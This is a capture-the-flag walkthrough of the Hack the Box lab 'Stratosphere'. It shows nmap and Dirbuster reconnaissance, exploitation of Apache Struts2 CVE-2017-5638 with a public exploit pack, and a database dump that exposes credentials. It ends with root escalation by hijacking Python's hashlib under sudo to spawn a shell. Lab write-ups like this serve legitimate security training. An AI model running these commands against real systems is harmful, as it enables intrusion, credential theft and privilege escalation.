Hack the Box: Stratosphere Walkthrough
Hello friends!! Today we are going to solve another CTF challenge “Stratosphere” which is a lab presented by Hack the Box and is available online for those who want to increase their skills in penetration testing and black box testing. Stratosphere is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.
Task: find user.txt and root.txt file in the victim’s machine.
Since these labs are online available therefore they have static IP. The IP of Stratosphere is 10.10.10.64
Let’s start off with scanning the network to find our target.
nmap -sV 10.10.10.64
As per nmap port, 80 is open for HTTP let’s explore the target IP in the browser. After exploring port 80, we were welcomed by the following page where we didn’t found any informative clue.
After then we visit Port 8080 for HTTP proxy and here also we get the same web page. We try to inspect the source code of port 80 and 8080 but we got nothing.
Therefore next we decided to have directory brute force attack with help of Dirbuster and used wordlist “dictionary-list-2.3-medium.txt” for the attack.
Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web browser.
So when we try to open the URL http://10.10.10.64:8080/Monitoring then it gets a redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I closely look at the URL containing .action extension, so I made Google search to extract complete information related to this extension. I found action extension is utilized by apache struts2 which has a history of bugs and vulnerabilities and if you will search for its exploit, you will get a lot of python scripts and exploits to compromise this service.
So we used nmap script to identify its state of vulnerability
nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to cve2017-563, let’s exploit it.
I found an exploit Struts-Apache-ExploitPack, let’s download it from git hub and give full permission.
git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git cd Struts-Apache-ExploitPack cd Exploiter ls chmod 777 Exploit.sh
Now run the following command to exploit the victim machine.
./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action id ls cat db_connect Username: admin Password: admin
So now we have database credential, let’s utilized them for getting all the information from inside the database.
mysqldump -u admin -padmin --all-databases --skip-lock-tables
Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user Richard, now let’s try to connect with SSH using these credential.
Yuppie we successfully logged in victim’s machine, so now let get the user.txt and root.txt
ls cat user.txt cat test.py
Here we notice that test.py was computing some hash values and at the end, it will give success.py from inside the root directory and the whole script depends upon hashlib.
Then we also check sudo rights for Richard and found he has sudo right to run all type of python script. So very first we check test.py file and start solving hashes in order to get success.py
sudo /usr/bin/python /home/richard/test.py
So we got the hash value, now we need to decode it and after decoding I found “kayboo!”
On submitting the decoded text, it generated a new hash for further step and again I decode it and submit the answer and after then again a new hash and it was processing repetitively same at each time on submitting decoded text.
Since test.py was importing hashlib which was a python library so I last option was python library hijacking to escalate the root privilege.
Therefore I create a hashlib.py script in the current directory to import system binary ‘/bin/bash’ and hence now when we will run the test.py then it will import hashlib.py which will calls /bin/bash binary file.
echo 'import os;os.system("/bin/bash")' > hashlib.py sudo /usr/bin/python /home/richard/test.py
Booom!!! Here we owned root access, now let’s get the root.txt file and finish this task.
Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing. Contact Here